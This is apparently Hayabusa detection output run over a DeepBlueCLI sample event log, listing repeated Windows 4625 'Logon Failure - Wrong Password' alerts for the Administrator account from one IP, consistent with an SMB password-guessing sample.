2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MO8VRRVANxIkDzEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ziSXANiDAf7LRFz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g0CvYYtyEcU2riBX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPg2LKgWMeM0Oqo0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbzL9T2d4RdeCz4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PeEfbWpoipfYtOKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RKJW1vSrIAbRTzyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aU4G8NBru22Vc4Cl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sacBcqxV97FUihrd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 41Ms0lEMeT0jYxYj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkQWVEHGM1NxowR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qKqRY7L2IQRoU57 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMIkvwbvqc9V6CFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PehzjCnK42ZPUE7e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fqw2GWiYfO0kU83 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFPJJNCFdPJl4igl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zc6CrAr7YoozKB6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHXminAIeV4ZJIK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06YmUCHNZqbaZMdZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fYoENCtP2uPy9xNh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TRJRuXJTTH1afAfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpnkzTlc3Uvj3hpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIuD8haFzR8P87rL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL1IreMAiE564NXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMUiCaMGBC46MnPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MOSWbwooyb60LExG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSDNF7s3vbtkZIOz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JBMk0qOV6237XtK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j41R1U1tYPvApCkZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcPkVZSeg5VwChW8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDLxt5gaFDTKsiVl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94JvBKdxJkawQQMT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KgBMk00K3iC1GQem | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XdGOj9Ybm6bcCo3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: by6F4YKorxhp5ahn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1G6ZOgOaV6luDQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qqSwNfvpPLQd6ZH1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mxtJJj54xSzHibHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Y3yznfdaZ7dtwDO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esllFn4asbLxwkBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Pr0cgd6cF5ukhZ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pS2fabTrbl6rZ1NB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkylDDmUyuT57HdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Aqs8rSvuLAQuhfDp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KI07KTgBJc4kBSKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Re3n3nJ8EEhRRT3G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BzspAC3z1csEn0Ve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tpkb6bf42SLUst3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1F5d2wn60OgAExW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bhPNRHWhTyonDPuA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zEsnyWpUuHVBo6et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I2FwaWy9TALkk9eU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fuikeQsxlOUVifVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZWdsRJp9fHypPI1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0j0IBX2eZnx99n9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YIZ5Knxg0xr0WmDb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wuej3f7mEoWmd4SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0LcCi06ilIhFPwb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWsCGgoFmH06rRf4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP47JjNKqtYIZPsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mNlWZ9o0xf7bl2d0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnPnB2lEN3BSDpXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVMyeF9jGuzHkTHg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sDKLl3PjW2qrzJGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkllnePSq3NQ5wgC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9qLWgQnR7P9cs7s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1AdU07nzvv7RB2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cHgiB5SMiQtsl5oD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 03e7QOn36l0jH35H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DoJBywV8x8cURwrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDYGYO6s6g6Dbx8r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nUqXpeTNePFyBmCo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2h0qJWcbzRe1GSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edsfNOovOl1Ow503 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
